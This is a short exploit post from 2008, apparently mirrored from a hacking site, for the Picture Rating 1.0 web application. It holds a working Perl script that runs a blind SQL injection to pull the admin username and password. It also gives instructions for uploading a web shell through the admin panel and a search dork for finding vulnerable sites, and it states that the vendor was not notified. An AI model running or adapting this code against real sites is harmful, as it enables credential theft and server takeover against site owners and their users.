Picture Rating 1.0 Blind SQL Injection Exploit
来源:h4ck-y0u.org 作者:t0pP8uZz 发布时间:2008-04-07
# -- Picture Rating 1.0 Blind SQL Injection Exploit --
# -Info/Instructions- # After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ # ok once you have logged in has admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now # register as a normal user or backup the database and get a existing users and login to the main site and navigate to upload image/photo and choose your shell and click upload # the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and thats your shell ;)
# Vendor Not Notified # Discovered By: t0pP8uZz # Discovered On: 6 April 2008 # greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!
# inurl:"index.php?cmd=" Latest Pictures hot
# -- Picture Rating 1.0 Blind SQL Injection Exploit --
use strict; use LWP::Simple;
print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n"; print "- Discovered && Coded By: t0pP8uZz -\n"; print "- Discovered On: 6 April 2008 -\n"; print "- -\n"; print "- This exploit will perform a automated BLIND SQL attack on .. -\n"; print "- .. the target host which is running the script. -\n"; print "--------------------------------------------------------------------\n";
print "\nEnter URL (ie: http://site.com/): "; chomp(my $url=<STDIN>); if(inject_test($url)) { print "Injecting.. Please Wait this could take several minutes..\n\n"; my $details = blind($url); print "Exploit Success! Admin Details: ".$details; exit; }
sub blind {
my $url = shift; my $res = undef; my $chr = 48; my $substr = 1; my $done = 1; while($done) { my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*"); if($content =~ /Previous/ && $chr == 94) { $done = 0; } elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } else { $chr++; } } return $res; }
sub inject_test {
my $url = shift; my $true = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1"); my $false = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2"); if($true =~ /Previous/ && $false !~ /Previous/) { print "\nTarget Site Vulnerable!\n\n"; return 1; } else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; } }
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